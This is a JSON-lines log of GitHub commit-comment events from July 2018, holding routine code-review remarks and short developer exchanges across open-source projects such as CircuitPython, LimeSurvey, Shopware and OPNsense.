{"id":"7918505503","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29595498,"position":null,"line":null,"path":null,"commit_id":"a2625c36a08f15cb7ca82d53ece7401b6ff70eb1","created_at":"2018-07-04T13:31:56Z","updated_at":"2018-07-04T13:31:56Z","author_association":"COLLABORATOR","body":"The levels are calculated nicely by the dual iso algorithm. So I am still not sure, if it would be better to just block the sliders in dual iso mode. If the range between B&W is to small or negative, dual iso breaks until reload clip with \"better settings\".\r\nOtherwise a clean implementation would block (buffer, and set when ready) new values while dual iso is calculating."}},"created_at":"2018-07-04T13:31:56Z"}
{"id":"7918508394","type":"CommitCommentEvent","actor":{"login":"ladyada"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29595500,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T13:32:28Z","updated_at":"2018-07-04T13:32:28Z","author_association":"MEMBER","body":"awesome! this is exciting!\r\nthach, we’ll figure out how to expose and optimize qspi flash later for msc"}},"created_at":"2018-07-04T13:32:28Z"}
{"id":"7918510692","type":"CommitCommentEvent","actor":{"login":"RudreshAmity"},"repo":{"name":"RudreshAmity/BotEverywhere"},"payload":{"comment":{"id":29595507,"position":null,"line":null,"path":null,"commit_id":"cfae841f0f8c9c121d8f5b0accad320128f308b6","created_at":"2018-07-04T13:32:54Z","updated_at":"2018-07-04T13:32:54Z","author_association":"OWNER","body":"Bot Everywhere Files\r\n"}},"created_at":"2018-07-04T13:32:54Z"}
{"id":"7918511029","type":"CommitCommentEvent","actor":{"login":"lenkis"},"repo":{"name":"tarantool/doc"},"payload":{"comment":{"id":29595509,"position":null,"line":null,"path":null,"commit_id":"7d9917533d0ebca89a32a6b9f2b727c01fb9e4d6","created_at":"2018-07-04T13:32:58Z","updated_at":"2018-07-04T13:32:58Z","author_association":"COLLABORATOR","body":"\"maximum header name length\" = 4 nouns in a row, this reads hard (unless you're a German).\r\n\r\nwhen merging to master, I rephrased this as \"the maximum length of a header name\" to make it evident how these 4 nouns belong to each other"}},"created_at":"2018-07-04T13:32:58Z"}
{"id":"7918515732","type":"CommitCommentEvent","actor":{"login":"rizzing"},"repo":{"name":"rizzing/vyvlo"},"payload":{"comment":{"id":29595519,"position":null,"line":null,"path":null,"commit_id":"9113f5f4617854ae9b656c9f1c292a8b93cd3d47","created_at":"2018-07-04T13:33:51Z","updated_at":"2018-07-04T13:33:51Z","author_association":"OWNER","body":"qwe"}},"created_at":"2018-07-04T13:33:51Z"}
{"id":"7918517906","type":"CommitCommentEvent","actor":{"login":"phhusson"},"repo":{"name":"aosp-tissot/frameworks_base"},"payload":{"comment":{"id":29595523,"position":null,"line":null,"path":null,"commit_id":"6182caa55d808c642d6e69aa516c808748f9bc9a","created_at":"2018-07-04T13:34:16Z","updated_at":"2018-07-04T13:34:16Z","author_association":"CONTRIBUTOR","body":"My guess is it's because of carriers.\r\nCarriers want to show their users how powerful their network is, and don't want the phone to report bad signal if the users have an antenna next to them.\r\nUsers would blame bad levels to the carrier, even if bad rssnr isn't usually because of the carrier.\r\nUsing RSRP instead of RSSNR basically shows the user how close to the antenna they are, so users see their carrier has more antennas"}},"created_at":"2018-07-04T13:34:16Z"}
{"id":"7918518129","type":"CommitCommentEvent","actor":{"login":"davidjin0813"},"repo":{"name":"springware1/ccm"},"payload":{"comment":{"id":29595524,"position":7,"line":1162,"path":"tests/1/dir/index.h","commit_id":"e9d1a1a381463e7d8a07a69bb2fd8bc11a81a2f3","created_at":"2018-07-04T13:34:18Z","updated_at":"2018-07-04T13:34:18Z","author_association":"COLLABORATOR","body":"how much do u earn a week?"}},"created_at":"2018-07-04T13:34:18Z"}
{"id":"7918526232","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29595540,"position":12,"line":99,"path":"application/models/Question.php","commit_id":"ae2a46cd5c33738b621bcd23360d8c4db7402830","created_at":"2018-07-04T13:35:51Z","updated_at":"2018-07-04T13:35:51Z","author_association":"CONTRIBUTOR","body":"This broke import of TSV survey file, possibly."}},"created_at":"2018-07-04T13:35:51Z"}
{"id":"7918527750","type":"CommitCommentEvent","actor":{"login":"ddennedy"},"repo":{"name":"mltframework/mlt"},"payload":{"comment":{"id":29595542,"position":null,"line":null,"path":null,"commit_id":"7bf5da86d4f2f8f83f45b9809fb061cbfdd97906","created_at":"2018-07-04T13:36:09Z","updated_at":"2018-07-04T13:36:09Z","author_association":"MEMBER","body":"@oberon-manjaro No bother; they are currently the same. Thanks. I will think about a way perhaps an app can indicate a preference for the qt or gtk2 module at run-time."}},"created_at":"2018-07-04T13:36:09Z"}
{"id":"7918528110","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595543,"position":55,"line":55,"path":"hw4naz (2)/components/AddBillScreen.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:36:12Z","updated_at":"2018-07-04T13:36:12Z","author_association":"NONE","body":"Либо используй `.bind(this, index)`, как ты делала раньше, либо пиши `onPress={() => this.handleToggleInvolvedFriend(index)`.\r\n\r\nЯ, наверно, ввёл тебя в заблуждение ранее, когда сказал, что `.bind` не нужен. Сорри.\r\n- `.bind` не нужен, когда ты создаёшь стрелочную функцию, а потом передаёшь в проп как `onPress={this.handlePress.bind(this)}`. В таком случае достаточно `onPress={this.handlePress}`.\r\n- Если же ты хочешь указать вручную какой-то параметр, то использование `.bind` уместно. То есть ты можешь писать `onPress={this.handlePressAtIndex(this. index)}`. Но правильнее / логичнее, как мне кажется, в таком случае просто писать `onPress={() => this.handlePressAtIndex(index)}`."}},"created_at":"2018-07-04T13:36:12Z"}
{"id":"7918528682","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29595544,"position":12,"line":99,"path":"application/models/Question.php","commit_id":"ae2a46cd5c33738b621bcd23360d8c4db7402830","created_at":"2018-07-04T13:36:18Z","updated_at":"2018-07-04T13:36:18Z","author_association":"CONTRIBUTOR","body":"Please fix. ;)"}},"created_at":"2018-07-04T13:36:18Z"}
{"id":"7918529316","type":"CommitCommentEvent","actor":{"login":"arturo182"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29595546,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T13:36:24Z","updated_at":"2018-07-04T13:36:24Z","author_association":"COLLABORATOR","body":"Will we also add a new class to busio on the nRF for the QSPI?"}},"created_at":"2018-07-04T13:36:24Z"}
{"id":"7918531529","type":"CommitCommentEvent","actor":{"login":"BusinessAlpaca"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29595548,"position":null,"line":null,"path":null,"commit_id":"82900959158e9370dc763c148f2afea1aaa3b594","created_at":"2018-07-04T13:36:49Z","updated_at":"2018-07-04T13:36:49Z","author_association":"OWNER","body":"1. I have failed to use the debugger. The multiple youtube tutorials about it got me nowhere...\r\n2. I don't really need to create a new HashMap every time. But now that I'm trying to fix it I keep getting a \"ConcurrentModificationException\"... need to look into that soon.\r\n3. comments to come!"}},"created_at":"2018-07-04T13:36:49Z"}
{"id":"7918533704","type":"CommitCommentEvent","actor":{"login":"ladyada"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29595552,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T13:37:12Z","updated_at":"2018-07-04T13:37:12Z","author_association":"MEMBER","body":"nono itll be for the filesys only, just like samd51. just much much faster than plain spi!"}},"created_at":"2018-07-04T13:37:12Z"}
{"id":"7918546119","type":"CommitCommentEvent","actor":{"login":"cosmicdan"},"repo":{"name":"aosp-tissot/frameworks_base"},"payload":{"comment":{"id":29595576,"position":null,"line":null,"path":null,"commit_id":"6182caa55d808c642d6e69aa516c808748f9bc9a","created_at":"2018-07-04T13:39:36Z","updated_at":"2018-07-04T13:39:36Z","author_association":"NONE","body":"That makes sense.\r\n\r\nThanks for the info. Now that I understand it, I'm personally in favor of considering this whole fiasco as \"WONTFIX\" on our end, and instead spreading the wisdom.\r\n\r\nCheers."}},"created_at":"2018-07-04T13:39:36Z"}
{"id":"7918549689","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595582,"position":79,"line":79,"path":"hw4naz (2)/components/AddBillScreen.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:40:16Z","updated_at":"2018-07-04T13:40:16Z","author_association":"NONE","body":"Ты, кажется, только в `App.js` переименовала хэндлеры. А тут почему нет? Надо быть чуть внимательнее."}},"created_at":"2018-07-04T13:40:16Z"}
{"id":"7918555225","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595593,"position":91,"line":91,"path":"hw4naz (2)/components/AddBillScreen.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:41:17Z","updated_at":"2018-07-04T13:41:17Z","author_association":"NONE","body":"Не прислушалась к моим замечаниям по поводу этого метода?"}},"created_at":"2018-07-04T13:41:17Z"}
{"id":"7918556009","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29595594,"position":null,"line":null,"path":null,"commit_id":"82900959158e9370dc763c148f2afea1aaa3b594","created_at":"2018-07-04T13:41:26Z","updated_at":"2018-07-04T13:41:26Z","author_association":"CONTRIBUTOR","body":"You're using the Map like an array. Don't. Use an array for direct index access, or a Map for more randomized or growing data set."}},"created_at":"2018-07-04T13:41:26Z"}
{"id":"7918556638","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595596,"position":119,"line":119,"path":"hw4naz (2)/components/AddBillScreen.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:41:33Z","updated_at":"2018-07-04T13:41:33Z","author_association":"NONE","body":"Как я сказал ранее, от этого метода можно избавиться."}},"created_at":"2018-07-04T13:41:33Z"}
{"id":"7918559136","type":"CommitCommentEvent","actor":{"login":"timogauweiler"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29595606,"position":68,"line":68,"path":"themes/Frontend/Bare/frontend/detail/content.tpl","commit_id":"3f0b1b08f0fb94d34cdc274c15a1b108727a987e","created_at":"2018-07-04T13:42:01Z","updated_at":"2018-07-04T13:42:01Z","author_association":"NONE","body":"Why is there sometimes a `{block}` around an `{include}` and sometimes not?\r\n\r\nWithout `{block}`\r\n[L22](https://github.com/shopware/shopware/commit/3f0b1b08f0fb94d34cdc274c15a1b108727a987e#diff-1a2c524c40930c457b7d7ba1e25e514aR22)\r\n[L34](https://github.com/shopware/shopware/commit/3f0b1b08f0fb94d34cdc274c15a1b108727a987e#diff-1a2c524c40930c457b7d7ba1e25e514aR34)\r\n[L39](https://github.com/shopware/shopware/commit/3f0b1b08f0fb94d34cdc274c15a1b108727a987e#diff-1a2c524c40930c457b7d7ba1e25e514aR39)\r\n[L61](https://github.com/shopware/shopware/commit/3f0b1b08f0fb94d34cdc274c15a1b108727a987e#diff-1a2c524c40930c457b7d7ba1e25e514aR61)\r\n[L64](https://github.com/shopware/shopware/commit/3f0b1b08f0fb94d34cdc274c15a1b108727a987e#diff-1a2c524c40930c457b7d7ba1e25e514aR64)\r\n\r\nWith `{block}`\r\n[L48](https://github.com/shopware/shopware/commit/3f0b1b08f0fb94d34cdc274c15a1b108727a987e#diff-1a2c524c40930c457b7d7ba1e25e514aR48)\r\n\r\nWhy is this handled in different ways here? Any specific reason?"}},"created_at":"2018-07-04T13:42:01Z"}
{"id":"7918564856","type":"CommitCommentEvent","actor":{"login":"maxnet"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29595618,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T13:43:04Z","updated_at":"2018-07-04T13:43:04Z","author_association":"NONE","body":"Here you go: https://github.com/linuxmint/ubiquity/blob/master/d-i/source/console-setup/debian/keyboard-configuration.config#L662\r\n\r\n(And I still believe keyboard layout should be a separate selection box anyway.\r\nAs there are plenty of countries with multiple official languages. Canada, Israel, etc.)"}},"created_at":"2018-07-04T13:43:04Z"}
{"id":"7918568237","type":"CommitCommentEvent","actor":{"login":"BusinessAlpaca"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29595624,"position":null,"line":null,"path":null,"commit_id":"82900959158e9370dc763c148f2afea1aaa3b594","created_at":"2018-07-04T13:43:41Z","updated_at":"2018-07-04T13:43:41Z","author_association":"OWNER","body":"I tried using an ArrayList first. Had the same bug with an uglier code..."}},"created_at":"2018-07-04T13:43:41Z"}
{"id":"7918569315","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29595629,"position":12,"line":99,"path":"application/models/Question.php","commit_id":"ae2a46cd5c33738b621bcd23360d8c4db7402830","created_at":"2018-07-04T13:43:53Z","updated_at":"2018-07-04T13:43:53Z","author_association":"COLLABORATOR","body":"@olleharstedt I rellay think we can not come back when we allow code with number (and same code in survey).\r\n\r\nWe fix it here in https://github.com/LimeSurvey/LimeSurvey/blob/7e9e5e0037511babb6d6bdbd2728d955628789bd/application/helpers/admin/import_helper.php#L1065 for lss, but for TSV : since it's easily editable by user : think it's bets to show the error and don't import potentially broken survey, no ?"}},"created_at":"2018-07-04T13:43:53Z"}
{"id":"7918569726","type":"CommitCommentEvent","actor":{"login":"tanakataiki"},"repo":{"name":"qqwweee/keras-yolo3"},"payload":{"comment":{"id":29595630,"position":5,"line":20,"path":"yolo.py","commit_id":"da7d756b0e47b979e701f0131ba7074ea138add8","created_at":"2018-07-04T13:43:58Z","updated_at":"2018-07-04T13:43:58Z","author_association":"COLLABORATOR","body":"Yes, you said, Idealy this is written somewhere utility file or shell.\r\n"}},"created_at":"2018-07-04T13:43:58Z"}
{"id":"7918573835","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29595637,"position":null,"line":null,"path":null,"commit_id":"0abd42c06de0b19b98360d04e2982996c42c7530","created_at":"2018-07-04T13:44:45Z","updated_at":"2018-07-04T13:44:45Z","author_association":"MEMBER","body":"@AdSchellevis work in progress or something required for 18.7-RC1 ? I'm assembling final pieces... skip for now is good for me too"}},"created_at":"2018-07-04T13:44:45Z"}
{"id":"7918577990","type":"CommitCommentEvent","actor":{"login":"spl237"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29595645,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T13:45:32Z","updated_at":"2018-07-04T13:45:32Z","author_association":"CONTRIBUTOR","body":"Brilliant - that's exactly what I needed. Many thanks."}},"created_at":"2018-07-04T13:45:32Z"}
{"id":"7918582559","type":"CommitCommentEvent","actor":{"login":"DupK"},"repo":{"name":"Feldupt/my_is_neg"},"payload":{"comment":{"id":29595655,"position":9,"line":9,"path":"my_is_neg.c","commit_id":"ab1e6393e5e56a43e739c4a8c41d5b9fc5fdf02d","created_at":"2018-07-04T13:46:22Z","updated_at":"2018-07-04T13:46:22Z","author_association":"NONE","body":"Missing '\\n'"}},"created_at":"2018-07-04T13:46:22Z"}
{"id":"7918583284","type":"CommitCommentEvent","actor":{"login":"DupK"},"repo":{"name":"Feldupt/my_is_neg"},"payload":{"comment":{"id":29595657,"position":13,"line":13,"path":"my_is_neg.c","commit_id":"ab1e6393e5e56a43e739c4a8c41d5b9fc5fdf02d","created_at":"2018-07-04T13:46:30Z","updated_at":"2018-07-04T13:46:30Z","author_association":"NONE","body":"Missing '\\n'"}},"created_at":"2018-07-04T13:46:30Z"}
{"id":"7918584661","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29595662,"position":null,"line":null,"path":null,"commit_id":"82900959158e9370dc763c148f2afea1aaa3b594","created_at":"2018-07-04T13:46:45Z","updated_at":"2018-07-04T13:46:45Z","author_association":"CONTRIBUTOR","body":"Array != ArrayList\r\nYou're never growing either map to more than 1,000,000 items. So just create int[1000000];"}},"created_at":"2018-07-04T13:46:45Z"}
{"id":"7918587239","type":"CommitCommentEvent","actor":{"login":"Atemo"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29595669,"position":77,"line":239,"path":"npc/re/merchants/OldGlastHeim_merchants.txt","commit_id":"6e8599cd5b161168e1ad5b8c23a8db2a7572d841","created_at":"2018-07-04T13:47:14Z","updated_at":"2018-07-04T13:47:14Z","author_association":"MEMBER","body":"You're right thanks !"}},"created_at":"2018-07-04T13:47:14Z"}
{"id":"7918593578","type":"CommitCommentEvent","actor":{"login":"tinect"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29595693,"position":68,"line":68,"path":"themes/Frontend/Bare/frontend/detail/content.tpl","commit_id":"3f0b1b08f0fb94d34cdc274c15a1b108727a987e","created_at":"2018-07-04T13:48:25Z","updated_at":"2018-07-04T13:48:25Z","author_association":"CONTRIBUTOR","body":"Looks like it's from the previous tpl. I think the reason is: `not breaking all custom-templates - with removing the \"single\" block`."}},"created_at":"2018-07-04T13:48:25Z"}
{"id":"7918596688","type":"CommitCommentEvent","actor":{"login":"Red-Teapot"},"repo":{"name":"Red-Teapot/bbyaworld.com"},"payload":{"comment":{"id":29595698,"position":null,"line":null,"path":null,"commit_id":"69a1ff7a66d42201f1b7b792b48c5acdb4d3d08c","created_at":"2018-07-04T13:49:01Z","updated_at":"2018-07-04T13:49:01Z","author_association":"OWNER","body":"Close #46 "}},"created_at":"2018-07-04T13:49:01Z"}
{"id":"7918600420","type":"CommitCommentEvent","actor":{"login":"BusinessAlpaca"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29595715,"position":null,"line":null,"path":null,"commit_id":"82900959158e9370dc763c148f2afea1aaa3b594","created_at":"2018-07-04T13:49:42Z","updated_at":"2018-07-04T13:49:42Z","author_association":"OWNER","body":"That was my first solution! But since the array size was always 1M items long, looping trough it took forever. It was much too slow. I wanted to shorten the loop time by having a shrinking set of things to loop through..."}},"created_at":"2018-07-04T13:49:42Z"}
{"id":"7918604300","type":"CommitCommentEvent","actor":{"login":"enbake-dev"},"repo":{"name":"activecm/ipfix-rita"},"payload":{"comment":{"id":29595722,"position":null,"line":null,"path":null,"commit_id":"8b594f48925986d0d5b5b4de2aac7b09edfbe657","created_at":"2018-07-04T13:50:23Z","updated_at":"2018-07-04T13:50:23Z","author_association":"COLLABORATOR","body":"@Zalgo2462 , For UDP two source test the session length is coming 1 which is failing the test case.\r\n`require.Len(t, sessions, 2)`\r\nAlso please let me know about when to use FlowStartMillisecondsAB and when FlowStartMillisecondsBA, basically AB or BA."}},"created_at":"2018-07-04T13:50:23Z"}
{"id":"7918612144","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29595746,"position":141,"line":141,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-04T13:51:51Z","updated_at":"2018-07-04T13:51:51Z","author_association":"NONE","body":"dont display or update window title (eats FPS)"}},"created_at":"2018-07-04T13:51:51Z"}
{"id":"7918617093","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29595755,"position":133,"line":133,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-04T13:52:45Z","updated_at":"2018-07-04T13:52:45Z","author_association":"NONE","body":"Ignore what I said\r\n\r\nactually still only measure this part of code, but with 1000 separate queries, and retrieve their results at the very end."}},"created_at":"2018-07-04T13:52:45Z"}
{"id":"7918619313","type":"CommitCommentEvent","actor":{"login":"RudreshAmity"},"repo":{"name":"RudreshAmity/BotEverywhere"},"payload":{"comment":{"id":29595761,"position":null,"line":null,"path":null,"commit_id":"341917823187cfd5992ec7f7bea2e8a246defdde","created_at":"2018-07-04T13:53:11Z","updated_at":"2018-07-04T13:53:11Z","author_association":"OWNER","body":"Basic Function"}},"created_at":"2018-07-04T13:53:11Z"}
{"id":"7918626606","type":"CommitCommentEvent","actor":{"login":"zschroder"},"repo":{"name":"jelsner/tor-clusters"},"payload":{"comment":{"id":29595773,"position":null,"line":null,"path":null,"commit_id":"11d2abcfaaa2d93cfbf6d4961a7edbddb545c844","created_at":"2018-07-04T13:54:32Z","updated_at":"2018-07-04T13:54:32Z","author_association":"COLLABORATOR","body":"Dr. Elsner,\n\n\nI am not sure why I was getting an error. I reran it today and it worked fine. It was saying empty geometries and when I opened the file it said numeric(0) in certain geometries.\n\n\nAlso, do we want to do a base .Rmd file? We can calculate information on the outbreaks (Out.sfdf), outbreak days (OutDays.sfdf), and individual tornadoes (TornData.sfdf). Then save.image of that .Rmd. I think it may be easier so we do not have to rerun everything every time we want to work on it. Instead, we can simply read in the saved image of the workspace. Then we can create a new .Rmd to run calculations and create charts/graphs/tables of the data. I wanted to run this by you before doing it. Let me know what you think. Thanks!\n\n\nZoe Schroder\n\n\nDoctoral Student\n\nFlorida State University\n\nDepartment of Geography\n\n\n________________________________\nFrom: James B. Elsner <notifications@github.com>\nSent: Wednesday, July 4, 2018 4:07:15 AM\nTo: jelsner/tor-clusters\nCc: Zoe Schroder; Author\nSubject: Re: [jelsner/tor-clusters] Was getting an error on the st_centroid function about no data in certain geometries. (11d2abc)\n\n\nWhy was there no data in certain geometries? Did you use data before 1994? I commented your lines since I was not getting this error.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/jelsner/tor-clusters/commit/11d2abcfaaa2d93cfbf6d4961a7edbddb545c844#commitcomment-29591306>, or mute the thread<https://github.com/notifications/unsubscribe-auth/Al-F1F9sBbl_FtN6ZIkXGEri6nL8JakOks5uDHezgaJpZM4VCIpd>.\n"}},"created_at":"2018-07-04T13:54:32Z"}
{"id":"7918631467","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"jkramer/rakudo"},"payload":{"comment":{"id":29595781,"position":null,"line":null,"path":null,"commit_id":"2be15efe3f784d62ef312b2aa9f61a132ec4564d","created_at":"2018-07-04T13:55:28Z","updated_at":"2018-07-04T13:55:28Z","author_association":"NONE","body":"This commit removes the fast path for things that are already Numeric, thereby punishing all  Numeric cases."}},"created_at":"2018-07-04T13:55:28Z"}
{"id":"7918631711","type":"CommitCommentEvent","actor":{"login":"shafaykhan"},"repo":{"name":"probelalkhan/wallpaper-app-admin"},"payload":{"comment":{"id":29595782,"position":null,"line":null,"path":null,"commit_id":"8d588c8fa48012ffdaa152b84262877ea2889f0c","created_at":"2018-07-04T13:55:30Z","updated_at":"2018-07-04T13:55:30Z","author_association":"NONE","body":"The character encoding of the HTML document was not declared. The document will render with garbled text in some browser configurations if the document contains characters from outside the US-ASCII range. The character encoding of the page must be declared in the document or in the transfer protocol.\r\nadmin.html\r\nError: Reference.set failed: First argument contains undefined in property 'categories.funny.thumbnail'\r\nfirebase.js:1:217279\r\nError: Reference.set failed: First argument contains undefined in property 'images.nature.-LG_XeWtSJxQsQ7A98Zn.url'\r\nfirebase.js:1:217279\r\nError: Reference.set failed: First argument contains undefined in property 'images.nature.-LG_XpDfXp1BSKhqvc0S.url'\r\nfirebase.js:1:217279\r\nError: Reference.set failed: First argument contains undefined in property 'images.nature.-LG_XrRIM-nIf0SvT18l.url'\r\n\r\n"}},"created_at":"2018-07-04T13:55:30Z"}
{"id":"7918637333","type":"CommitCommentEvent","actor":{"login":"capiscuas"},"repo":{"name":"capiscuas/redmine"},"payload":{"comment":{"id":29595789,"position":null,"line":null,"path":null,"commit_id":"a671038bd9143b5992558885d8cc410421924c2e","created_at":"2018-07-04T13:56:32Z","updated_at":"2018-07-04T13:56:32Z","author_association":"OWNER","body":"Gender-neutralized the 'child/parent' adjectives in latin languages."}},"created_at":"2018-07-04T13:56:32Z"}
{"id":"7918639292","type":"CommitCommentEvent","actor":{"login":"eswanth"},"repo":{"name":"eswanth/target"},"payload":{"comment":{"id":29595794,"position":null,"line":null,"path":null,"commit_id":"d98e474ce2bbe3ffabeccbfe13690e46516c54fa","created_at":"2018-07-04T13:56:54Z","updated_at":"2018-07-04T13:56:54Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-04T13:56:54Z"}
{"id":"7918640681","type":"CommitCommentEvent","actor":{"login":"eswanth"},"repo":{"name":"eswanth/target"},"payload":{"comment":{"id":29595796,"position":null,"line":null,"path":null,"commit_id":"d98e474ce2bbe3ffabeccbfe13690e46516c54fa","created_at":"2018-07-04T13:57:11Z","updated_at":"2018-07-04T13:57:11Z","author_association":"OWNER","body":"jf"}},"created_at":"2018-07-04T13:57:11Z"}
{"id":"7918643771","type":"CommitCommentEvent","actor":{"login":"eswanth"},"repo":{"name":"eswanth/target"},"payload":{"comment":{"id":29595803,"position":4,"line":4,"path":"src/main/java/wipro/App.java","commit_id":"d98e474ce2bbe3ffabeccbfe13690e46516c54fa","created_at":"2018-07-04T13:57:46Z","updated_at":"2018-07-04T13:57:46Z","author_association":"OWNER","body":"file is having problem"}},"created_at":"2018-07-04T13:57:46Z"}
{"id":"7918644560","type":"CommitCommentEvent","actor":{"login":"panneerselvamsn"},"repo":{"name":"panneerTrails/spring-profile-ex"},"payload":{"comment":{"id":29595804,"position":null,"line":null,"path":null,"commit_id":"b05608b7dc49ef3355291965b244a2eb3dc20eeb","created_at":"2018-07-04T13:57:55Z","updated_at":"2018-07-04T13:57:55Z","author_association":"CONTRIBUTOR","body":"code for spring profile"}},"created_at":"2018-07-04T13:57:55Z"}
{"id":"7918647956","type":"CommitCommentEvent","actor":{"login":"msprunck"},"repo":{"name":"threatgrid/ctia"},"payload":{"comment":{"id":29595814,"position":45,"line":241,"path":"test/ctia/entity/judgement_test.clj","commit_id":"cb0673903daf377f6eb24859114abc7da0f85726","created_at":"2018-07-04T13:58:33Z","updated_at":"2018-07-04T13:58:33Z","author_association":"CONTRIBUTOR","body":"You can remove this part. It's already set by the `helpers/fixture-properties:cors`"}},"created_at":"2018-07-04T13:58:33Z"}
{"id":"7918648727","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29595817,"position":null,"line":null,"path":null,"commit_id":"0abd42c06de0b19b98360d04e2982996c42c7530","created_at":"2018-07-04T13:58:41Z","updated_at":"2018-07-04T13:58:41Z","author_association":"MEMBER","body":"@fichtner it's finished, small fix, can be in 18.1 as well, we don't use rowSelect in OPNsense :)"}},"created_at":"2018-07-04T13:58:41Z"}
{"id":"7918649618","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29595820,"position":null,"line":null,"path":null,"commit_id":"d03f720da9b3cabcb7783667afaaa041226dd132","created_at":"2018-07-04T13:58:51Z","updated_at":"2018-07-04T13:58:51Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-246](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-246).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-246-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-04T13:58:51Z"}
{"id":"7918649877","type":"CommitCommentEvent","actor":{"login":"Radha143"},"repo":{"name":"Radha143/awinashradha"},"payload":{"comment":{"id":29595821,"position":null,"line":null,"path":null,"commit_id":"db6ea92b2365cf2d5cc1fcbf00fbf4fdd8ec0b55","created_at":"2018-07-04T13:58:54Z","updated_at":"2018-07-04T13:58:54Z","author_association":"OWNER","body":"new file created\r\n"}},"created_at":"2018-07-04T13:58:54Z"}
{"id":"7918650026","type":"CommitCommentEvent","actor":{"login":"BusinessAlpaca"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29595822,"position":null,"line":null,"path":null,"commit_id":"82900959158e9370dc763c148f2afea1aaa3b594","created_at":"2018-07-04T13:58:56Z","updated_at":"2018-07-04T13:58:56Z","author_association":"OWNER","body":"I'll figure it out..."}},"created_at":"2018-07-04T13:58:56Z"}
{"id":"7918650995","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29595823,"position":3,"line":62,"path":"addons/web/static/src/js/views/kanban/kanban_record.js","commit_id":"3406b40f03fb143fb4f2424077b9f04ad7d9f6f6","created_at":"2018-07-04T13:59:06Z","updated_at":"2018-07-04T13:59:06Z","author_association":"NONE","body":"missing doc"}},"created_at":"2018-07-04T13:59:06Z"}
